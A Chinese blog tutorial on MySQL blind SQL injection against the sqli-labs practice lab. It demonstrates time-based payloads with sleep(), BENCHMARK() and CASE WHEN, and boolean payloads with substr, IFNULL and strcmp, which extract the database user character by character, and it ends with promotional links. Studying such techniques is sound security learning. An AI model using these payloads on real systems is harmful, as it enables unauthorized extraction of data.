2024年SQL注入学习之盲注(八)_笛卡尔积盲注

最新推荐文章于 2024-05-05 22:15:36 发布
最新推荐文章于 2024-05-05 22:15:36 发布
阅读量24 收藏 2
点赞数 7
文章标签: sql 学习 android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84264536/article/details/138401568
版权
  1. 盲注中使用 and 你得确定你查询的值得存在 。
  2. 在返回多组数据的情况下,你的延时不再是 单纯的 sleep(5) 他将根据你返回的数据条数来反复执行
  3. 在如同搜索型时尽量搜索存在且数目较少的关键词
  4. 尽量不要使用 or

至于以上为什么会出现这种原因 推荐大家看看 这篇文章讲的很清楚https://www.t00ls.net/thread-45590-1-10.html

0x02 简单时间盲注

时间盲注也叫延时注入 一般用到函数 sleep() BENCHMARK() 还可以使用笛卡尔积(尽量不要使用,内容太多会很慢很慢),查阅mysql手册会发现很多东西

一般时间盲注我们还需要使用条件判断函数

if()

if(expre1,expre2,expre3) 当expre1为true时,返回expre2,false时,返回expre3
盲注的同时也配合着mysql提供的分割函,与正则函数 like函数,比较函数等等,还是那句话多看手册。

substr
substring
left
......

我们一般喜欢把分割的函数编码一下,当然不编码也行,编码的好处就是可以不用引号 常用到的就有 ascii() hex() 等等
benchmark()其作用是来测试一些函数的执行速度。benchmark()中带有两个参数,第一个是执行的次数,第二个是要执行的函数或者是表达式。

mysql> select * from users where id =1 and if((substr((select user()),1,1)='r'),sleep(5),1);
Empty set (5.01 sec)

mysql> select * from users where id =1 and if((substr((select user()),1,1)='r1'),sleep(5),1);
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> select * from users where id =1 and if((substr((select user()),1,1)='r'),BENCHMARK(20000000,md5('a')),1);
Empty set (5.15 sec)
case when then else end
mysql> select * from users where id =1 and case when (substr((select user()),1,1)="rr") then sleep(3) else 1 end;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> select * from users where id =1 and case when (substr((select user()),1,1)="r") then sleep(3) else 1 end;
Empty set (3.00 sec)

不推荐使用笛卡尔积当数据过多时会造成DOS。

0x03 布尔盲注

盲注思路的思路很多 比如正则匹配,比较函数,运算符,推荐大家可以看看
https://www.anquanke.com/post/id/170626

  1. 直接通过字符串截取对比,类似函数很多后面做个总结吧
http://127.0.0.1/sqli/Less-1/?id=1' and substr((select user()),1,1)='r' -- +
  1. IFNULL() 函数
http://127.0.0.1/sqli/Less-1/?id=1' and IFNULL((substr((select user()),1,1)='r'),0) -- +
  1. 使用 比较函数strcmp()
1.

http://127.0.0.1/sqli/Less-1/?id=1' and strcmp((substr((select user()),1,1)='r'),1) -- +
http://127.0.0.1/sqli/Less-1/?id=1' and strcmp((substr((select user()),1,1)='r'),0) -- +


2.

mysql> select * from users where id =1 and 0=strcmp((substr((select user()),1,1)),'o');
Empty set (0.00 sec)

mysql> select * from users where id =1 and 0=strcmp((substr((select user()),2,1)),'o');


## 写在最后

**在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。**


需要完整版PDF学习资源私我



**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**[需要这份系统化资料的朋友,可以点击这里获取](https://bbs.csdn.net/topics/618540462)**

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
2401_84264536
关注
  • 7
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入速查笔记
10-22 4万+
SQL 注入分类方式: 提交方式:GET POST COOKIE 参数注入:数字型/字符型/搜索型 数据库类型:ACCESS/Mysql/MSSQL/Oracle 手工注入方法:联合查询、报错注入、盲注(基于布尔型、基于时间延迟) 0x01、Mysql Mysql划分:权限 root 普通用户 版本 mysql>5.0 mysql<5.0 1.1 root权限 lo...
笛卡尔积sql_SQL注入经验大负荷注入
weixin_39944375的博客
12-09 922
注:本文出自Gcow安全团队绝影小组成员瞳话SQL注入经验—利用笛卡尔算积进行大负荷注入在常见的渗透测试中,我们都知道SQL注入攻击中有联合查询,报错注入,盲注还有DNS注入等等,那么如果一个网站存在基于时间的盲注,而恰好sleep这类核心函数被过滤的话,我们如何绕过进行注入呢,这里就分享一个经验——大负荷注入。一.笛卡尔算积作为一个数学7分的我来说,看到这个数学名词瞬间就不想接着往下...
SQL注入学习盲注
公众号:乌云安全
02-03 1169
0x00 盲注 盲注我这里只归纳为 时间盲注 布尔盲注 其实在如今的实际环境中一般盲注的情况毕竟多,时间盲注太费时间 同时对网络要求比较高,二分,dnslog,等等可以加快注入的进程。 0x01 盲注中值得注意的问题 盲注中使用 and 你得确定你查询的值得存在 。 在返回多组数据的情况下,你的延时不再是 单纯的 sleep(5) 他将根据你返回的数据条数来反复执行 在如同搜索型时尽量搜索存在且数目较少的关键词 尽量不要使用 or 至于以上为什么会出现这种原因 推荐大家看看
SQL注入盲注
cike_y
08-15 1607
关于SQL注入的详细解析,有什么疑问欢迎大家提出
网络安全从入门到精通(第五章-4)盲注
划水的小白白
01-30 481
本文内容: 注入全方位之盲注 ~盲注介绍 ~盲注需要掌握的几个函数 ~延时注入(时间注入)做法 ~我的理解 每日一句: 谷歌和百度是我们最好的老师
sql注入学习——布尔盲注
Lemon's blog
07-27 828
前言:之前通过前九关学习到了回显注入、报错注入等一些方法,这次就来详细的学习布尔盲注和时间盲注。 首先来了解一下盲注的概念 盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。 布尔盲注 原理: 注入的时候只会返回True和False,所以布尔盲注就是根据页面显示的是True还是False进行猜测数据库中的信息。 ...
sql盲注
weixin_48734687的博客
10-10 198
sql盲注 目录 什么是盲注 盲注原理 盲注分类 如何盲注 什么是盲注 当我们进行sql注入时,若向服务器发送的请求正确时,服务器会正常返回正确的数据;如果我们的请求是错误的,服务器不会返回任何信息。 盲注原理 盲注是我们向服务器发送一个逻辑判断请求,通过对返回值的真或假来分析数据库的结构和获取数据库的数据。 盲注分类 基于布尔的盲注 基于时间的盲注 如何盲注 以获取当前数据库名来介绍盲注步骤,获取其他数据与当前类似。 靶场:sqli-lab/less-8 1.在正确的参数后面加上’ 、"
MySQL盲注
聚鼎安全
01-08 719
这里写目录标题布尔盲注时间盲注sleep函数benchmark函数笛卡尔积函数get_lock盲注正则DOS RLIKE注入dnslog盲注后续待补充 布尔盲注 盲注一般先看长度 id=4 and length(user())=14 布尔盲注的方法 substr,substring,mid,left,right截取单个字符 id=4 and substr((select user()),1,1)=0x72 id=4 and left((select user()),1)=0x72 用ascii(),or
reduce 一个 笛卡尔积_笛卡尔积是什么,详细解答一下,最好再举例
weixin_42097533的博客
01-14 936
假设集合A={a,b},集合B={0,1,2},则两个集合的笛卡尔积为{(a,0),(a,1),(a,2),(b,0),(b,1),(b,2)}。可以扩展到多个集合的情况。类似的例子有,如果A表示某学校学生的集合,B表示该学校所有课程的集合,则A与B的笛卡尔积表示所有可能的选课情况。 [编辑本段]笛卡尔积的运算性质  由于有序对中x,y的位置是确定的,因此A×B的记法也是确定的,不能写成B×A.笛...
draw_trace.m.zip_机器人_机械臂笛卡尔_机械臂运动_笛卡尔机器人_笛卡尔空间
07-14
本文将围绕"draw_trace.m"这个MATLAB脚本,深入探讨机器人在笛卡尔空间中的运动轨迹仿真,以及与之相关的知识点。 首先,我们要理解“笛卡尔空间”(Cartesian Space)的概念。笛卡尔空间是以笛卡尔坐标系为基础的...
SQL注入-基于时间的盲注
qq_43691308的博客
04-06 920
SQL注入mysql,时间盲注盲注
mysql+limit+sql注入_sql注入之limit注入和五种时间盲注姿势
weixin_28803437的博客
01-19 651
0x00前言limit注入和时间前面也提过一点点了,真的非常简单,真不太想单独写一个这个来水博客。。这里还是记录一下吧以后忘了方便复习。0x01 limit基础知识照抄前面的:这里简单记录一下我自己经常会忘的知识点,觉得不值得再写一篇博客去水了233使用查询语句的时候,经常要使用limit返回前几条或者中间某几行数据SELECT*FROMtableLIMIT[offset,]rows...
网络安全从零开始(盲注
GetorPost的博客
01-10 3232
首先需要明确一个概念:注入的本质以及注入的条件。 1.注入攻击的本质就是将用户输入的数据当做代码执行。 2.注入的先决条件: 用户可以控制输入 原本程序要执行的代码拼接上用户输入的数据然后执行
SQL盲注
火柴人的博客
03-17 1408
0x00盲注的一般模式 1.and 0 mysql> select * from bsqli where id = 1 and 1(payload结果) and sleep(1); Empty set (1.00 sec) mysql> select * from bsqli where id = 1 and 0(payload结果) and sleep(1); Empty set ...
2024最全寒假学习第11天--中间件漏洞--vulhub--thinkphp全系列,2024最新vue总结来了
最新发布
2401_84545016的博客
05-05 1047
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。注意上面的第一个index是模块,第二个index是方法,name是操作名,后面的是操作。
超硬核,SQL注入之时间盲注,原理+步骤+实战思路(1)
2401_84296945的博客
04-30 1081
时间盲注是指基于时间的盲注,也叫延时注入,根据页面的响应时间来判断是否存在注入。
网络安全零基础入门(第五章-4)盲注
素笺
03-28 150
每日一句:盲注,考验你的耐心! 本篇内容:盲注介绍      布尔盲注      时间盲注      盲注需要的函数      延时注入(时间注入) 一、盲注介绍 1.注入攻击本质:用户输入的数据当做代码去执行 2.条件:     用户可以控制输入     原本程序要执行的代码,拼接了用户的内容,然后执行了      3.定义:     盲注对应的是显错注入。但是很多时候,web服务器关闭了错...
时间盲注
aaartemis的博客
01-17 607
盲注 盲注分为两类: 1.布尔盲注 布尔很明显Ture跟Fales,也就是说它只会根据. 你的注入信息返回Ture跟Fales,也就没有了之前的报错信息。 2.时间盲注 界面返回值只有一种,true.无论输入任何值 返回情况都会按正常的来处理。加入特定的时间函数,通过查看web页面返回的时间差来判断注入的语句是否正确。 简书:Hell0_C 时间盲注 逐字注入 select * fro...
【ctf】sql注入——基于时间的盲注
wlllllianqing的博客
09-18 832
基于时间的盲注 原理:利用sleep()或benchmark()等函数让mysql执行时间变长,并结合判断条件if(expr1,expr2,expr3),然后通过页面的响应时间长短来判断语句返回的值是TRUE还是False,从而猜解一些未知的字段。 函数sleep(duration): 睡眠(暂停)时间为duration参数给定的秒数,然后返回0。若sleep()被中断,它会返回1。 select * from table where id=1 and sleep(3); select * from tab
SQL数据库基础:关系、笛卡尔积与元组解析
本文主要介绍了SQL数据库中的基本概念,包括关系、域、笛卡尔积、元组、分量、基数、关系以及相关的属性和码。 在数据库领域,SQL(Structured Query Language)是一种用于管理和处理关系型数据库的标准语言。关系...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值